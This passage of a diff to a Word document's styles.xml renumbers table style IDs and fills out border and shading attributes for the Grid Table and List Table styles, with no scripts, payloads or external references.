   </w:style>
-  <w:style w:type="table" w:styleId="55">
+  <w:style w:type="table" w:styleId="758">
     <w:name w:val="Grid Table 6 Colorful - Accent 2"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -11594,9 +11776,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="56">
+  <w:style w:type="table" w:styleId="759">
     <w:name w:val="Grid Table 6 Colorful - Accent 3"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -11824,9 +12006,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="57">
+  <w:style w:type="table" w:styleId="760">
     <w:name w:val="Grid Table 6 Colorful - Accent 4"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -12054,9 +12236,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="58">
+  <w:style w:type="table" w:styleId="761">
     <w:name w:val="Grid Table 6 Colorful - Accent 5"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -12284,9 +12466,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="59">
+  <w:style w:type="table" w:styleId="762">
     <w:name w:val="Grid Table 6 Colorful - Accent 6"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -12514,9 +12696,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="60">
+  <w:style w:type="table" w:styleId="763">
     <w:name w:val="Grid Table 7 Colorful"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -12618,11 +12800,11 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:right w:val="single" w:color="000000" w:themeColor="text1" w:themeTint="80" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
@@ -12645,10 +12827,10 @@
       <w:tcPr>
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:themeTint="80" w:sz="4" w:space="0"/>
-          <w:right w:val="none"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -12668,12 +12850,12 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:left w:val="single" w:color="000000" w:themeColor="text1" w:themeTint="80" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -12696,9 +12878,9 @@
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
           <w:top w:val="single" w:color="000000" w:themeColor="text1" w:themeTint="80" w:sz="4" w:space="0"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -12768,9 +12950,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="61">
+  <w:style w:type="table" w:styleId="764">
     <w:name w:val="Grid Table 7 Colorful - Accent 1"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -12872,11 +13054,11 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:right w:val="single" w:color="000000" w:themeColor="accent1" w:themeTint="80" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
@@ -12899,10 +13081,10 @@
       <w:tcPr>
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:bottom w:val="single" w:color="000000" w:themeColor="accent1" w:themeTint="80" w:sz="4" w:space="0"/>
-          <w:right w:val="none"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -12922,12 +13104,12 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:left w:val="single" w:color="000000" w:themeColor="accent1" w:themeTint="80" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -12950,9 +13132,9 @@
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
           <w:top w:val="single" w:color="000000" w:themeColor="accent1" w:themeTint="80" w:sz="4" w:space="0"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -13022,9 +13204,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="62">
+  <w:style w:type="table" w:styleId="765">
     <w:name w:val="Grid Table 7 Colorful - Accent 2"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -13126,11 +13308,11 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:right w:val="single" w:color="000000" w:themeColor="accent2" w:themeTint="97" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
@@ -13153,10 +13335,10 @@
       <w:tcPr>
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:bottom w:val="single" w:color="000000" w:themeColor="accent2" w:themeTint="97" w:sz="4" w:space="0"/>
-          <w:right w:val="none"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -13176,12 +13358,12 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:left w:val="single" w:color="000000" w:themeColor="accent2" w:themeTint="97" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -13204,9 +13386,9 @@
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
           <w:top w:val="single" w:color="000000" w:themeColor="accent2" w:themeTint="97" w:sz="4" w:space="0"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -13276,9 +13458,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="63">
+  <w:style w:type="table" w:styleId="766">
     <w:name w:val="Grid Table 7 Colorful - Accent 3"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -13380,11 +13562,11 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:right w:val="single" w:color="000000" w:themeColor="accent3" w:themeTint="FE" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
@@ -13407,10 +13589,10 @@
       <w:tcPr>
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:bottom w:val="single" w:color="000000" w:themeColor="accent3" w:themeTint="FE" w:sz="4" w:space="0"/>
-          <w:right w:val="none"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -13430,12 +13612,12 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:left w:val="single" w:color="000000" w:themeColor="accent3" w:themeTint="FE" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -13458,9 +13640,9 @@
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
           <w:top w:val="single" w:color="000000" w:themeColor="accent3" w:themeTint="FE" w:sz="4" w:space="0"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -13530,9 +13712,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="64">
+  <w:style w:type="table" w:styleId="767">
     <w:name w:val="Grid Table 7 Colorful - Accent 4"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -13634,11 +13816,11 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:right w:val="single" w:color="000000" w:themeColor="accent4" w:themeTint="9A" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
@@ -13661,10 +13843,10 @@
       <w:tcPr>
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:bottom w:val="single" w:color="000000" w:themeColor="accent4" w:themeTint="9A" w:sz="4" w:space="0"/>
-          <w:right w:val="none"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -13684,12 +13866,12 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:left w:val="single" w:color="000000" w:themeColor="accent4" w:themeTint="9A" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -13712,9 +13894,9 @@
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
           <w:top w:val="single" w:color="000000" w:themeColor="accent4" w:themeTint="9A" w:sz="4" w:space="0"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -13784,9 +13966,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="65">
+  <w:style w:type="table" w:styleId="768">
     <w:name w:val="Grid Table 7 Colorful - Accent 5"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -13888,11 +14070,11 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:right w:val="single" w:color="000000" w:themeColor="accent5" w:themeTint="90" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
@@ -13915,10 +14097,10 @@
       <w:tcPr>
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:bottom w:val="single" w:color="000000" w:themeColor="accent5" w:themeTint="90" w:sz="4" w:space="0"/>
-          <w:right w:val="none"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -13938,12 +14120,12 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:left w:val="single" w:color="000000" w:themeColor="accent5" w:themeTint="90" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -13966,9 +14148,9 @@
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
           <w:top w:val="single" w:color="000000" w:themeColor="accent5" w:themeTint="90" w:sz="4" w:space="0"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -14038,9 +14220,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="66">
+  <w:style w:type="table" w:styleId="769">
     <w:name w:val="Grid Table 7 Colorful - Accent 6"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -14142,11 +14324,11 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:right w:val="single" w:color="000000" w:themeColor="accent6" w:themeTint="90" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
@@ -14169,10 +14351,10 @@
       <w:tcPr>
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
-          <w:left w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:bottom w:val="single" w:color="000000" w:themeColor="accent6" w:themeTint="90" w:sz="4" w:space="0"/>
-          <w:right w:val="none"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -14192,12 +14374,12 @@
         <w:tblBorders/>
       </w:tblPr>
       <w:tcPr>
-        <w:shd w:color="ffffff"/>
+        <w:shd w:val="clear" w:color="ffffff"/>
         <w:tcBorders>
-          <w:top w:val="none"/>
+          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
           <w:left w:val="single" w:color="000000" w:themeColor="accent6" w:themeTint="90" w:sz="4" w:space="0"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -14220,9 +14402,9 @@
         <w:shd w:val="clear" w:color="ffffff" w:themeColor="light1" w:fill="ffffff" w:themeFill="light1"/>
         <w:tcBorders>
           <w:top w:val="single" w:color="000000" w:themeColor="accent6" w:themeTint="90" w:sz="4" w:space="0"/>
-          <w:left w:val="none"/>
-          <w:bottom w:val="none"/>
-          <w:right w:val="none"/>
+          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
         </w:tcBorders>
       </w:tcPr>
     </w:tblStylePr>
@@ -14292,9 +14474,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="67">
+  <w:style w:type="table" w:styleId="770">
     <w:name w:val="List Table 1 Light"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -14508,9 +14690,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="68">
+  <w:style w:type="table" w:styleId="771">
     <w:name w:val="List Table 1 Light - Accent 1"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -14724,9 +14906,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="69">
+  <w:style w:type="table" w:styleId="772">
     <w:name w:val="List Table 1 Light - Accent 2"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -14940,9 +15122,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="70">
+  <w:style w:type="table" w:styleId="773">
     <w:name w:val="List Table 1 Light - Accent 3"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -15156,9 +15338,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="71">
+  <w:style w:type="table" w:styleId="774">
     <w:name w:val="List Table 1 Light - Accent 4"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -15372,9 +15554,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="72">
+  <w:style w:type="table" w:styleId="775">
     <w:name w:val="List Table 1 Light - Accent 5"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -15588,9 +15770,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="73">
+  <w:style w:type="table" w:styleId="776">
     <w:name w:val="List Table 1 Light - Accent 6"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -15804,9 +15986,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="74">
+  <w:style w:type="table" w:styleId="777">
     <w:name w:val="List Table 2"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -16042,9 +16224,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="75">
+  <w:style w:type="table" w:styleId="778">
     <w:name w:val="List Table 2 - Accent 1"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -16280,9 +16462,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="76">
+  <w:style w:type="table" w:styleId="779">
     <w:name w:val="List Table 2 - Accent 2"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -16518,9 +16700,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="77">
+  <w:style w:type="table" w:styleId="780">
     <w:name w:val="List Table 2 - Accent 3"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -16756,9 +16938,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="78">
+  <w:style w:type="table" w:styleId="781">
     <w:name w:val="List Table 2 - Accent 4"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -16994,9 +17176,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="79">
+  <w:style w:type="table" w:styleId="782">
     <w:name w:val="List Table 2 - Accent 5"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -17232,9 +17414,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="80">
+  <w:style w:type="table" w:styleId="783">
     <w:name w:val="List Table 2 - Accent 6"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -17470,9 +17652,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="81">
+  <w:style w:type="table" w:styleId="784">
     <w:name w:val="List Table 3"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -17698,9 +17880,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="82">
+  <w:style w:type="table" w:styleId="785">
     <w:name w:val="List Table 3 - Accent 1"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -17926,9 +18108,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="83">
+  <w:style w:type="table" w:styleId="786">
     <w:name w:val="List Table 3 - Accent 2"/>
-    <w:basedOn w:val="10"/>
+    <w:basedOn w:val="713"/>
     <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:pBdr/>
@@ -18154,9 +18336,9 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="table" w:styleId="84">
+  <w:style w:type="table" w:styleId="787">
     <w:name w:val="List Table 3 - Accent 3"/>
-    <w:basedOn w:val="10"/>
